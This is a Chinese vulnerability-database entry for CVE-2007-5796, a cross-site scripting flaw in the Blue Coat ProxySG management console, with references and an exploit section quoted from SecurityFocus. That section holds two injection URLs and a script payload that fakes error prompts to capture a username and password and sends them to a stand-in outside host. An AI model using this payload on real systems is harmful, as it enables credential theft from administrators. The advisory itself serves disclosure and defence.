Blue Coat ProxySG 管理控制台跨站脚本攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1113863 漏洞类型 跨站脚本
发布时间 2007-10-29 更新时间 2007-11-15
CVE编号 CVE-2007-5796 CNNVD-ID CNNVD-200711-035
漏洞平台 Multiple CVSS评分 4.3
|漏洞来源
https://www.exploit-db.com/exploits/30729
https://www.securityfocus.com/bid/26286
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200711-035
|漏洞详情
BlueCoatProxySG的管理控制台中存在跨站脚本攻击漏洞。远程攻击者通过修改用于加载证书废弃列表的URL来注入任意web脚本或HTML。
|漏洞EXP
source: http://www.securityfocus.com/bid/26286/info

Blue Coat ProxySG Management Console is prone to two cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Versions prior to ProxySG 4.2.6.1 and 5.2.2.5 are vulnerable.

NOTE: This BID originally covered one issue, but was updated to also cover a second issue. 

https://www.example.com:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00 https://www.example.com:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!-- Example Payload: <script> do { a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME",""); b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD",""); }while(a==null || b==null || a=="" || b==""); alert("owned!:"+a+"/"+b);window.location="http://www.example2.com/?u="+a+"&p="+b </script><!--
|受影响的产品
Blue Coat Systems SGOS 4.1.2 Blue Coat Systems ProxySG 0
|参考资料

来源:VUPEN
名称:ADV-2007-3678
链接:http://www.frsirt.com/english/advisories/2007/3678
来源:www.bluecoat.com
链接:http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability
来源:SECUNIA
名称:27452
链接:http://secunia.com/advisories/27452
来源:XF
名称:proxysg-management-console-xss(38213)
链接:http://xforce.iss.net/xforce/xfdb/38213
来源:SECTRACK
名称:1018888
链接:http://www.securitytracker.com/id?1018888